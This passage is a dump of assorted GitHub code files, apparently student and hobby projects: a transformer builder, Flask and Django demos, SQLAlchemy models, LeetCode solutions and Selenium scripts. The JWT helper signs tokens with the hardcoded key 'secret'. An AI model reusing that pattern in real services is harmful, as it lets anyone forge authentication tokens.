     LOG.error(\"Create Snapshot Required field(s) - %s\" % e)\n            raise exception.BadRequest(\"Required element/key - %s was not specified\" % e)\n\ndef create_resource(version='1.0'):\n    controller = {\n        '1.0': Controller,\n        }[version]()\n\n    metadata = {\n        \"attributes\": {\n            \"snapshot\": [\"id\", \"state\", \"availabilityZone\", \"createdTime\", \"instanceId\",\n                        \"engine\", \"engineVersion\"],\n            \"link\": [\"rel\", \"href\"],\n            },\n        }\n\n    xmlns = {\n        '1.0': common.XML_NS_V10,\n        }[version]\n\n    serializers = {\n        'application/xml': wsgi.XMLDictSerializer(metadata=metadata, xmlns=xmlns),\n        }\n\n    deserializers = {\n        'application/xml': deserializer.InstanceXMLDeserializer(),\n        }\n\n    response_serializer = wsgi.ResponseSerializer(body_serializers=serializers)\n    request_deserializer = wsgi.RequestDeserializer(deserializers)\n    return wsgi.Resource(controller, deserializer=request_deserializer, serializer=response_serializer)\n","repo_name":"CaptTofu/reddwarf","sub_path":"reddwarf/api/snapshots.py","file_name":"snapshots.py","file_ext":"py","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"21007093486","text":"def getSearchResult(searchItem, listOfItems):\n    finalList = []\n\n    for item in listOfItems:\n        finalList.append(computeObject(searchItem,item))\n\n    finalList = sorted(finalList, key=lambda x: (x[\"num\"],x[\"original\"]))\n    listToReturn = []\n    for i in finalList:\n        listToReturn.append(i[\"stringVal\"])\n    return listToReturn\n\ndef computeObject(searchItem,item):\n    itemCopy = item\n    return {\n        \"num\": 1,\n        \"original\": item,\n        \"stringVal\": 
\"-Sams+ung\"\n }","repo_name":"sidb28/TeamPeanuts-CodeIt2020","sub_path":"i.py","file_name":"i.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11890253164","text":"from trasnformer import Transformer\nfrom multihead_attention import MultiHeadAttention\nfrom input_embedding import InputEmbeddings\nfrom positional_encoding import PositionalEncoding\nfrom feedforward import FeedForward\nfrom encoder_block import EncoderBlock, Encoder\nfrom decoder_block import DecoderBlock, Decoder\nfrom projection import Projection\n\nimport torch \nimport torch.nn as nn\n\ndef build_transformer(src_vocab_size, target_vocab_size, src_seq_len, target_seq_len, d_model =512, N = 6, h=8, dropout=0.1, d_ff=2048) -> Transformer:\n # embeddings \n src_embeddings = InputEmbeddings(d_model, src_vocab_size)\n target_embeddings = InputEmbeddings(d_model, target_vocab_size)\n \n # positional encoding layers\n src_pos_emb = PositionalEncoding(d_model, src_seq_len, dropout)\n target_pos_emb = PositionalEncoding(d_model, target_seq_len, dropout)\n \n # encoder blocks\n encoder_blocks = []\n for _ in range(N):\n enc_attention_block = MultiHeadAttention(d_model, h, dropout)\n ff_block = FeedForward(d_model, d_ff, dropout)\n encoder_block = EncoderBlock(d_model, enc_attention_block, ff_block, dropout)\n encoder_blocks.append(encoder_block)\n \n # decoder blocks\n decoder_blocks = []\n for _ in range(N):\n decoder_attnetion_block = MultiHeadAttention(d_model, h, dropout)\n decoder_cross_attention_block = MultiHeadAttention(d_model, h, dropout)\n ff_block = FeedForward(d_model, d_ff, dropout)\n decoder_block = DecoderBlock(d_model, decoder_attnetion_block, decoder_cross_attention_block, ff_block, dropout)\n decoder_blocks.append(decoder_block)\n \n # create a complete encoder decoder \n encoder = Encoder(d_model, nn.ModuleList(encoder_blocks))\n decoder = Decoder(d_model, nn.ModuleList(decoder_blocks))\n \n # projection layer\n projection = Projection(d_model, target_vocab_size)\n \n # Transformer \n transformer = Transformer(encoder, decoder, src_embeddings, target_embeddings, src_pos_emb, target_pos_emb, projection)\n \n # parameter initialization\n for p in transformer.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n \n return transformer","repo_name":"pvsnp9/building-transformer-nmt","sub_path":"builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72248586387","text":"from .views import (\n RegistrationAPIView, EmailVerificationAPIView, LoginAPIView, FileUploadView\n) \nfrom django.urls import path\n\nurlpatterns = [\n path('user/', RegistrationAPIView.as_view()),\n path('user/verification/', EmailVerificationAPIView.as_view()),\n path('login/', LoginAPIView.as_view()),\n path('upload_images/', FileUploadView.as_view()),\n]\n","repo_name":"GautamAjani/aubergine_practical","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35462107152","text":"import datetime\nfrom sqlalchemy import Column, Integer, BigInteger, String, ForeignKey, Sequence, DateTime\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.ext.hybrid import hybrid_property\nfrom settings import Base\n\n\nclass Application(Base):\n\t__tablename__ = 
'applications'\n\n\tcommercial_state_rejected = 0\n\tcommercial_state_approved = 1\n\tcommercial_state_pending = 2\n\n\tid = Column(Integer, Sequence('application_id_seq'), primary_key=True)\n\tcompany_id = Column(ForeignKey('companies.id'))\n\tagree = Column(Integer)\n\tamount = Column(Integer)\n\tname = Column(String(50))\n\tnumber_payments = Column(Integer)\n\n\tpayments = relationship(\"Payment\", back_populates=\"application\")\n\tcompany = relationship(\"Company\", back_populates=\"applications\")\n\n\t@hybrid_property\n\tdef is_approved(self):\n\t\treturn self.commercial_state == self.commercial_state_approved\n\n\t@hybrid_property\n\tdef agree_state(self):\n\t\tif self.is_approved:\n\t\t\tif self.agree == 1:\n\t\t\t\treturn 'Si'\n\t\t\telif self.agree == 0:\n\t\t\t\treturn 'No'\n\n\t\t\treturn 'Pendiente'\n\n\t\treturn '-'\n\n\t@hybrid_property\n\tdef commercial_state(self):\n\t\tif(self.amount < 1000000):\n\t\t\treturn self.commercial_state_pending\n\t\telif(self.amount <= 10000000):\n\t\t\treturn self.commercial_state_approved\n\t\t\n\t\treturn self.commercial_state_rejected\n\n\t@hybrid_property\n\tdef commercial_state_text(self):\n\t\tif(self.commercial_state == self.commercial_state_pending):\n\t\t\treturn \"Pendiente\"\n\t\telif(self.commercial_state == self.commercial_state_approved):\n\t\t\treturn \"Aprobado\"\n\n\t\treturn \"Rechazado\"\n\n\t@hybrid_property\n\tdef count_payments(self):\n\t\treturn len(self.payments)\n\nclass City(Base):\n\t__tablename__ = 'cities'\n\n\tid = Column(Integer, Sequence('city_id_seq'), primary_key=True)\n\tcontry_id = Column(ForeignKey('contries.id'))\n\tname = Column(String(50))\n\n\tcountry = relationship(\"Country\", back_populates=\"cities\")\n\tcompanies = relationship(\"Company\", back_populates=\"city\")\n\tusers = relationship(\"User\", back_populates=\"city\")\n\n\nclass Company(Base):\n\t__tablename__ = 'companies'\n\n\tid = Column(Integer, Sequence('company_id_seq'), primary_key=True)\n\tcity_id = Column(ForeignKey('cities.id'))\n\tuser_id = Column(ForeignKey('users.id'))\n\taddress = Column(String(50))\n\tname = Column(String(50))\n\ttel = Column(String(50))\n\n\tapplications = relationship(\"Application\", back_populates=\"company\")\n\tcity = relationship(\"City\", back_populates=\"companies\")\n\tuser = relationship(\"User\", back_populates=\"company\", uselist=False)\n\n\nclass Country(Base):\n\t__tablename__ = 'contries'\n\n\tid = Column(Integer, Sequence('country_id_seq'), primary_key=True)\n\tname = Column(String(50))\n\n\tcities = relationship(\"City\", back_populates=\"country\")\n\t\n\nclass Payment(Base):\n __tablename__ = 'payments'\n\n id = Column(Integer, Sequence('payment_id_seq'), primary_key=True)\n application_id = Column(ForeignKey('applications.id'))\n value = Column(Integer)\n created_at = Column(DateTime, default=datetime.datetime.utcnow)\n\n application = relationship(\"Application\", back_populates=\"payments\")\t\t\n\t\n\nclass User(Base):\n\t__tablename__ = 'users'\n\n\tid = Column(Integer, Sequence('user_id_seq'), primary_key=True)\n\tcity_id = Column(ForeignKey('cities.id'))\n\tdoc = Column(BigInteger)\n\temail = Column(String(50))\n\tname = Column(String(50))\n\tpassword = Column(String(255))\n\ttel = Column(String(50))\n\n\tcity = relationship(\"City\", back_populates=\"users\")\n\tcompany = relationship(\"Company\", back_populates=\"user\", 
uselist=False)\n\n\n","repo_name":"andrestntx/teprestamos.com","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"464701355","text":"# add_binary.py\n\n\ndef addBinary(a: str, b: str) -> str:\n    a = list(a)\n    b = list(b)\n    c = \"\"\n    carry = 0\n    while a or b or carry:\n        if a:\n            carry += int(a.pop())\n        if b:\n            carry += int(b.pop())\n        c += str(carry % 2)\n        carry //= 2\n\n    return c[::-1]\n\nif __name__ == \"__main__\":\n    print(\"=====Example 1=====\")\n    a = \"11\"\n    b = \"1\"\n    expected = \"100\"\n    result = addBinary(a, b)\n    print(f\"Expected:\\n\\t{expected}\")\n    print(f\"Result:\\n\\t{result}\")\n\n    print(\"=====Example 2=====\")\n    a = \"1010\"\n    b = \"1011\"\n    expected = \"10101\"\n    result = addBinary(a, b)\n    print(f\"Expected:\\n\\t{expected}\")\n    print(f\"Result:\\n\\t{result}\")\n\n    print(\"=====Example 3=====\")\n    a = \"0\"\n    b = \"0\"\n    expected = \"0\"\n    result = addBinary(a, b)\n    print(f\"Expected:\\n\\t{expected}\")\n    print(f\"Result:\\n\\t{result}\")\n","repo_name":"giwankim/algo","sub_path":"leetcode/67-add-binary/add_binary.py","file_name":"add_binary.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12459658835","text":"import socket\nimport time\nimport twitter\nimport redis\nimport os\nfrom dotenv import load_dotenv\n\n\nmi_socket = socket.socket()\nmi_socket.bind(('localhost', 9000))\nmi_socket.listen(5)\n\ndef getTweetsWords(q, until_date, count=1):\n    load_dotenv()\n    api = twitter.Api(consumer_key=os.environ.get(\"CONSUMER_KEY\"),\n                    consumer_secret=os.environ.get(\"CONSUMER_SECRET\"),\n                    access_token_key=os.environ.get(\"ACCESS_TOKEN_KEY\"),\n                    access_token_secret=os.environ.get(\"ACCESS_TOKKEN_SECRET\"))\n\n    tweets = api.GetSearch(\n        raw_query=f'q={q}%20&result_type=recent&until={until_date}&lang=es&count={count}')\n\n    return tweets[0].text # This is a tweet\n\nwhile True:\n    conexion, addr = mi_socket.accept()\n    print(\"Connection established\")\n    print(addr)\n    current_data = getTweetsWords(\"covid\", \"2020-06-30\", \"1\")\n    print(current_data)\n    conexion.send(bytes(current_data.encode(encoding='UTF-8')))\n\n    conexion.close()\n","repo_name":"alvaroenrique/bigdata-twitter-stream","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19743024819","text":"from flask import Flask, request, render_template\nimport random \napp = Flask(__name__)\n\n@app.route('/')\ndef display_homepage():\n    return render_template('homepage.html')\n\n@app.route('/froyo')\ndef choose_froyo():\n    return render_template('froyo-form.html')\n\n@app.route('/results', methods=['GET'])\ndef froyo_results():\n    context = {\n        'name': request.args.get('full_name'),\n        'users_email': request.args.get('email'),\n        'users_phone': request.args.get('phone'),\n        'flavor': request.args.get('flavor'),\n        'pizza_size': request.args.get('size'),\n        'toppings': request.args.get('toppings')\n    }\n    return render_template('froyo-results.html', **context)\n\n\n@app.route('/favorites')\ndef choose_favorites():\n    return render_template('fav-form.html')\n\n@app.route('/favorite_results', methods=['GET'])\ndef favorite_results():\n    context = {\n        'color': request.args.get('color'),\n        'animal': request.args.get('animal'),\n        'city': 
request.args.get('city')\n }\n return render_template('fav-results.html', **context)\n\n\n@app.route('/secret_message')\ndef secret_message():\n return render_template('sec-mess-form.html')\n\n@app.route('/message_results', methods=['POST'])\ndef display_secret_message():\n secret_message = request.form.get('secret_message')\n def sortString(str):\n return ''.join(sorted(str))\n secret_message= sortString(secret_message)\n\n context = {\n 'secret_message': secret_message\n }\n return render_template('sec-mess-results.html', **context)\n\n\n@app.route('/calculator')\ndef calculator_form():\n return render_template('calculator-form.html')\n\n\n@app.route('/calculator_results', methods=['GET'])\ndef calculator_results():\n operation = request.args.get('operation')\n first_number = request.args.get('first-number')\n second_number = request.args.get('second-number')\n\n if (operation == 'add'):\n result = int(first_number) + int(second_number)\n elif (operation == 'subtract'):\n result = int(first_number) - int(second_number)\n elif (operation == 'multiply'):\n result = int(first_number) * int(second_number)\n elif (operation == 'division'):\n result = int(first_number) / int(second_number)\n\n context = {\n 'operation': operation,\n 'first_number': first_number,\n 'second_number': second_number,\n 'result': result\n }\n return render_template('calculator-results.html', **context)\n\n\n\n@app.route('/horoscope')\ndef horoscope():\n return render_template('horoscope_form.html')\n\n\n@app.route('/horoscope_results', methods=['GET'])\ndef display_horoscope():\n month = request.args.get('month')\n day = request.args.get('day')\n if (month == 'jan'):\n sign = 'Aquarius'\n horoscope = \"Will you go out with me? Be careful if a person says yes when you ask that question today, Aquarius. You could take the nature of this situation to the extreme. Saying yes doesn't mean you're suddenly in charge of his or her life. Nor are you responsible for anything that person does or how they feel. If you're still asking the question without getting any positive responses, don't worry. Keep trying.\"\n if (month == 'feb'):\n sign = 'pisces'\n horoscope = \"Powerful issues arise in your life that make it difficult to find peace, Pisces. Perhaps your first tendency is to confide in your partner. More than likely, this person is contributing to the difficulties you're now having. Your best bet is to spend some time alone. If you're already alone, so much the better. Cherish this time instead of letting it make you mad.\"\n if (month == 'mar'):\n sign = 'aries'\n horoscope = 'You may be trying to get to the end of the road too quickly without really enjoying all the steps along the way'\n if (month == 'apr'):\n sign = 'Taurus'\n horoscope = 'When your heart is gently touched, it feels loving, generous, and supportive of everyone, Taurus. If your heart is lonely, it feels deserted by everyone.'\n if (month == 'may'):\n sign = 'gemini'\n horoscope = \"You may be like a giant trying to befriend a small bug, Gemini. You have absolutely nothing in common and don't even speak the same language. With one accidental move, you could easily squash that little bug. This isn't to say that you can't learn to become best friends. Just know that this kind of relationship is going to take some work.\"\n if (month == 'jun'):\n sign = 'cancer'\n horoscope = \"There is irony in today's situation, Cancer. The only real remedy for situations like this is to accept them and joke about it. 
If you try to take yourself too seriously, especially when it comes to art or romance, you will inevitably fail.\"\n if (month == 'jul'):\n sign = 'Leo'\n horoscope = \"The hungrier you get, the more determined you will become, Leo. Be careful that your determination doesn't turn into desperation and neediness. It's unattractive and will get you nowhere. Keep on the upward spiral, and let determination turn into inspiration and cooperation. You will find this especially true when it comes to matters of the heart. You have a great deal of power. Put it to good use.\"\n if (month == 'aug'):\n sign = 'virgo'\n horoscope = \"If you're in the market for romance, Virgo, whether with a new partner or rekindling the fire with a current partner, be careful. Small issues could rage out control today. Extreme conditions are likely to occur, thanks to your sensitive emotions combined with a surge of energy from the outside. Try not to get too upset when tension rises because of something unimportant.\"\n if (month == 'sept'):\n sign = 'libra'\n horoscope = \"Things may get a bit difficult in your romantic life because of someone in the partnership who isn't necessarily taking a very realistic approach to the situation, Libra. There's a bit of a power play going on as someone tries to throw their weight around without considering the other person's feelings. Tension is brewing, and you'd be wise to deal with it now.\"\n if (month == 'oct'):\n sign = 'scorpio'\n horoscope = \"Your creative juices are flowing freely, Scorpio, but there appears to be a roadblock. Something or someone apparently doesn't want you to continue down the path you're on. Perhaps he or she is scared that you're going to discover a whole new passion in life that they don't necessarily agree with. Don't forget who is running your show - you and no one else.\"\n if (month == 'nov'):\n sign = 'saggitarius'\n horoscope = \"At the end of the day, you're the one who has to look in the mirror and know who you are, Sagittarius. Think about this the next time you're tempted to make a rude comment or spread a displeasing fact about someone else. One side of you may be able to rationalize behavior that the other side simply despises. Today look at both of sides of yourself, not just the one that pleases you.\"\n if (month == 'dec'):\n sign = 'capricorn'\n horoscope = \"When it comes to romance, your body is apt to turn to jelly today. You may be so emotional that you can't function, Capricorn. That's love. And even though it can be heavenly, it can also be debilitating. You could deliberate for hours about an issue because you don't want to make a move without your partner's input. 
If you don't have a romantic partner now, find one soon, but not today.\"\n lucky_number = random.randint(1,99)\n context = {\n 'name': request.args.get('operation'),\n 'horoscope': horoscope,\n 'lucky_number': lucky_number\n }\n return render_template('horoscope_result.html', **context)\n\n\nif __name__ == '__main__':\n app.run(debug=True, port = 3000)\n\n","repo_name":"lougoncharenko/ACS-1710-Assignments","sub_path":"ACS1710-Assignment2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22033503333","text":"import jwt\n\n\nclass Jwt:\n\n @staticmethod\n def jwtEncode(data: str) -> str:\n myJwt = jwt.encode(data, \"secret\", algorithm=\"HS256\")\n return myJwt\n\n @staticmethod\n def jwtDecode(data: str) -> bool:\n if data:\n try:\n jwt.decode(data, \"secret\", algorithms=[\"HS256\"])\n return True\n except (jwt.InvalidTokenError, jwt.DecodeError) as err:\n print(err)\n return False\n else:\n return False\n","repo_name":"THILAD/API_DEMO","sub_path":"PythonRestfulAndSocket/services/myJwt.py","file_name":"myJwt.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19504168895","text":"from wsgiref.simple_server import make_server\n# wsgiref本身就是个web框架,提供了一些固定的功能(请求和响应信息的封装,不需要我们自己写原生的socket了也不需要咱们自己来完成请求信息的提取了,提取起来很方便)\n#函数名字随便起\ndef application(environ, start_response):\n '''\n :param environ: 是全部加工好的请求信息,加工成了一个字典,通过字典取值的方式就能拿到很多你想要拿到的信息\n :param start_response: 帮你封装响应信息的(响应行和响应头),注意下面的参数\n :return:\n '''\n start_response('200 OK', [('k1','v1'),])\n # print(environ)\n print(environ['PATH_INFO']) #输入地址127.0.0.1:8000,这个打印的是'/',输入的是127.0.0.1:8000/index,打印结果是'/index'\n return [b'
<h1>Hello, web!</h1>
']\n\n#和咱们学的socketserver那个模块很像啊\nhttpd = make_server('127.0.0.1', 8080, application)\n\nprint('Serving HTTP on port 8080...')\n# 开始监听HTTP请求:\nhttpd.serve_forever()","repo_name":"myin1994/mylearn","sub_path":"Python框架/day46/07 wsgiref版.py","file_name":"07 wsgiref版.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22957254713","text":"import keyboard\r\nimport sys\r\nimport tkinter\r\nfrom PIL import Image, ImageTk\r\nimport threading\r\nimport time\r\nimport simpleaudio\r\n\r\nvalue = 2\r\ndouble_continue = False\r\n\r\n\r\n\"\"\"\r\ndef key_input():\r\n global item, canvas, txt, value\r\n value = txt.get()\r\n\"\"\"\r\n\r\ndef show_image():\r\n#外から触れるようにグローバル変数で定義\r\n global item, canvas, txt, value\r\n\r\n root = tkinter.Tk()\r\n root.title('test')\r\n root.geometry(\"250x250\")\r\n canvas = tkinter.Canvas(bg = \"black\", width=250, height=250)\r\n canvas.place(x=0, y=0)\r\n img = Image.open('image\\image1.png')\r\n img= ImageTk.PhotoImage(img)\r\n item = canvas.create_image(0, 0, image=img, anchor=tkinter.NW)\r\n root.mainloop()\r\n\"\"\"\r\n#入力ボックス作成\r\n txt = tkinter.Entry(width=20)\r\n txt.place(x=90, y=70)\r\n btn = tkinter.Button(root, text='変更', command=key_input)\r\n btn.place(x=140, y=70)\r\n\r\n\"\"\"\r\n#音声処理用ライブラリ\r\nimport speech_recognition as sr\r\n#発話用ライブラリ\r\nimport win32com.client\r\nimport winsound\r\n\r\n# Webサイトにアクセスするためのライブラリ\r\nimport requests\r\n# Webページの中のデータにアクセスできるようにするためのライブラリ\r\nfrom bs4 import BeautifulSoup\r\n#Web検索を行えるライブラリ\r\nfrom selenium import webdriver\r\nimport chromedriver_binary\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.select import Select\r\nfrom selenium.webdriver.chrome.options import Options\r\nimport urllib\r\n#文字列から抽出\r\nimport re\r\n\r\ndriver_path = \"C:\\\\driver\\\\chromedriver.exe\"\r\ndef talk(content):\r\n sapi = win32com.client.Dispatch(\"SAPI.SpVoice\")\r\n dog = win32com.client.Dispatch(\"SAPI.SpObjectTokenCategory\")\r\n dog.SetID(r\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Voices\", False)\r\n\r\n v = [t for t in dog.EnumerateTokens() if t.GetAttribute(\"Name\") == \"Microsoft Sayaka\"]\r\n if v:\r\n oldv = sapi.Voice\r\n sapi.Voice = v[0]\r\n sapi.Speak(content)\r\n sapi.Voice = oldv\r\n\r\ndef sound_effect(filename):\r\n wav_obj = simpleaudio.WaveObject.from_wave_file(filename)\r\n play_obj = wav_obj.play()\r\n play_obj.wait_done()\r\n\r\n#スレッドを立ててtkinterの画像表示を開始する\r\nthread1 = threading.Thread(target = show_image)\r\nthread1.start()\r\n\r\n\r\nr = sr.Recognizer()\r\n \r\n \r\n#url = 'https://www.amazon.co.jp/s?k='+text+'&__mk_ja_JP=カタカナ'\r\n#requests.get(url)\r\noptions = webdriver.ChromeOptions()\r\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\r\nbrowser = webdriver.Chrome(options=options)\r\nbrowser.get(\"http://www.amazon.co.jp/\")\r\n# 検索フォームが表示されるまで10秒待つ\r\nelement = WebDriverWait(browser, 10).until(EC.presence_of_element_located((By.NAME, \"field-keywords\")))\r\n\r\n# 検索フォームのテキストをクリア\r\n#browser.find_element_by_name(\"field-keywords\").clear()\r\ntalk(\"お探しの物はなんですか?\")\r\nwhile True:\r\n start = time.process_time()\r\n sound_effect(\"sound\\system41.wav\")\r\n with sr.Microphone() as input:\r\n r.adjust_for_ambient_noise(input)\r\n print(\"録音中:\")\r\n audio = 
r.listen(input)\r\n end = time.process_time()\r\n try:\r\n text = r.recognize_google(audio, language='ja-JP')\r\n print(text)\r\n keyword = text\r\n print(keyword)\r\n break\r\n except:\r\n print(\"認識できませんでした\")\r\n# 検索フォームにキーワードを入力\r\nelement.send_keys(keyword)\r\n\r\n# 検索実行\r\nelement.send_keys(Keys.RETURN)\r\n\r\nlink = browser.current_url\r\nprint(link)\r\nlinkjp = urllib.parse.unquote(link, 'UTF-8')\r\nprint(linkjp)\r\nhtml = requests.get(link)\r\n# ライブラリ'BeautifulSoup'を使って中のデータに自由にアクセスできるようにします。\r\nsoup = BeautifulSoup(html.content, 'html.parser') \r\ncats = soup.select(\"div#departments > ul > li\")\r\ndepartlist = []\r\nfor cat in cats:\r\n departlist.append(cat.get('id'))\r\nprint(departlist)\r\nbirds = soup.select(\"div#brandsRefinements> ul > li\")\r\nrefinelist = []\r\nfor bird in birds:\r\n refinelist.append(bird.get('id'))\r\nprint(refinelist)\r\n\r\ntalk(\"価格やブランド、接続方式と、重視するポイントが決まっていれば教えてください。\")\r\nprice = \"\"\r\nbrand = \"\"\r\nwhile True:\r\n start = time.process_time()\r\n sound_effect(\"sound\\system41.wav\")\r\n with sr.Microphone() as input:\r\n r.adjust_for_ambient_noise(input)\r\n print(\"録音中:\")\r\n audio = r.listen(input)\r\n end = time.process_time()\r\n try:\r\n text = r.recognize_google(audio, language='ja-JP')\r\n print(text)\r\n if \"安い\" in text:\r\n price = \"&s=price-asc-rank\"\r\n browser.get(linkjp + brand + price)#ページ読み込み\r\n talk(\"価格の安い順で並べ替えました。何かありましたらもう一度声をかけてください。\")\r\n continue\r\n elif \"高い\" in text:\r\n price = \"&s=price-desc-rank\"\r\n browser.get(linkjp + brand + price)#ページ読み込み\r\n talk(\"価格の高い順で並べ替えました。何かありましたらもう一度声をかけてください。\")\r\n continue\r\n elif \"円\" in text:\r\n price_only = \"\"\r\n price_line = int(re.sub(r\"\\D\", \"\", text))\r\n if \"万円\" in text:\r\n price_only = str(price_line) + \"0000\"\r\n price_line = str(price_line*0.9) + \"-\" + str(price_line*1.1)\r\n price = \"&price=\" + price_line\r\n browser.get(linkjp + brand + price)#ページ読み込み\r\n talk((price_only)+ \"円付近商品のみ表示しました。何かありましたらもう一度声をかけてください。\")\r\n continue\r\n elif \"リセット\" in text or \"解除\" in text:\r\n brand = \"\"\r\n price = \"\"\r\n browser.get(linkjp)#ページ読み込み\r\n talk(\"すべての検索条件をリセットしました。何かありましたらもう一度声をかけてください\")\r\n elif 'p_89/' + text in refinelist:\r\n text = text.replace('p_89/',\"\")\r\n brand = \"&rh=n:3210981,p_89:\" + text\r\n print(linkjp + \"&s=price-asc-rank\" + brand +price_line)\r\n browser.get(linkjp + brand + price)#ページ読み込み\r\n talk(text + \"の商品のみ表示しました。何かありましたらもう一度声をかけてください\")\r\n elif \"価格\" in text:\r\n talk(\"価格の安い順、高い順、具体的な価格は決まっていますか?\")\r\n continue\r\n elif \"ブランド\" in text:\r\n talk(\"どのブランドでしょうか?\")\r\n elif \"接続方式\" in text:\r\n talk(\"ここに接続方式の処理をかく\")\r\n except:\r\n print(\"認識できませんでした\")","repo_name":"kx47g/sotsuken","sub_path":"vui_main.py","file_name":"vui_main.py","file_ext":"py","file_size_in_byte":7099,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24157317597","text":"from user import User\nfrom database import Database\nimport twitter_util\n\nDatabase.initialise() #initialise database\nuser_email = input(\"Enter your email address :\") #Ask for user email\nuser = User.load_from_db_by_email(user_email) #load the data from database\n\nif not user: #if user is not there in database\n request_token = twitter_util.get_request_token() #ask for request token\n\n oauth_verifier = twitter_util.get_oauth_verifier(request_token) #get the oauth verifier\n\n access_token = twitter_util.get_access_token(request_token,oauth_verifier) #get access token\n #Register the new 
user\n\n first_name = input(\"Enter your first name :\")\n last_name = input(\"Enter your last name :\")\n user = User(user_email,first_name,last_name,access_token['oauth_token'],access_token['oauth_token_secret'],None)\n user.save_to_db()\n\nuri = 'https://api.twitter.com/1.1/search/tweets.json?q=computers+filter:images'\ntweets = user.twitter_request(uri)\nfor tweet in tweets['statuses']:\n print(tweet['text'])","repo_name":"tarun-sharma-vst-au4/Twitter-Sentiment-Analysis","sub_path":"files/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7900385981","text":"import sys\ninput = sys.stdin.readline\nfrom collections import deque\nfrom itertools import combinations\n\nN, M = map(int, input().split())\nmaps = [list(map(int, input().split())) for _ in range(N)]\n\nhome = []\nchicken = []\n\n# 치킨집 탐방\nfor i in range(N):\n for j in range(N):\n if maps[i][j] == 2:\n chicken.append([i, j])\n elif maps[i][j] == 1:\n home.append([i, j])\nprint(\"home = \", home)\n\n# 치킨집 선택 리스트\npch = list(combinations(chicken, M))\nprint(\"pch = \", pch)\n# 결과 저장할 리스트\nresult = [0] * len(pch)\n\nfor i in home:\n for j in range(len(pch)):\n a = 100\n for k in pch[j]:\n temp = abs(i[0]-k[0]) + abs(i[1]-k[1])\n a = min(a, temp)\n # print(\"i,j, k, a = \", i,j, k, a)\n result[j] += a\n\nprint(result)\nprint(min(result))\n","repo_name":"GayeonKimm/CT","sub_path":"BOJ/구현/15686 치킨 배달.py","file_name":"15686 치킨 배달.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70053011985","text":"class TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\ndef lowestCommonAncestor(\n self, root: \"TreeNode\", p: \"TreeNode\", q: \"TreeNode\"\n) -> \"TreeNode\":\n # def __init__(self):\n # self.ans = None\n\n stack = [root]\n parent = {root: None}\n\n while p not in parent or q not in parent:\n node = stack.pop()\n if node.left:\n parent[node.left] = node\n stack.append(node.left)\n if node.right:\n parent[node.right] = node\n stack.append(node.right)\n ancestor = set()\n while p:\n ancestor.add(p)\n p = parent[p]\n while q not in ancestor:\n q = parent[q]\n return q\n","repo_name":"DivyanshiChouksey/Data-Structure-Algorithm","sub_path":"230.Youngest Common Ancestor.py","file_name":"230.Youngest Common Ancestor.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38577638107","text":"'''\n封装滞纳金收款独立功能\n'''\n\nfrom selenium import webdriver\nfrom PageObject.addLateFeeCollectionPage import *\nfrom PageObject.tableDataPage import *\nfrom toolKit.log import *\nfrom toolKit.highLightElement import *\n\n\n\ndef addLateFeeCollection(driver, merchantName='', contractName='', lateFeeNum='', paymentTime='', collectionMoney='', deductMoney=''):\n\talfcp = AddLateFeeCollectionPage(driver)\n\tlogger.info(u'测试滞纳金收款')\n\talfcp.financialManagement().click()\n\tlogger.info(u'点击财务管理')\n\talfcp.lateFeeManagement().click()\n\tlogger.info(u'点击滞纳金管理')\n\talfcp.lateFeeCollection().click()\n\tlogger.info(u'点击滞纳金收款')\n\ttime.sleep(4)\n\tdriver.switch_to.frame(alfcp.frameOfLateFeeCollection())\n\thighLightElement(driver, 
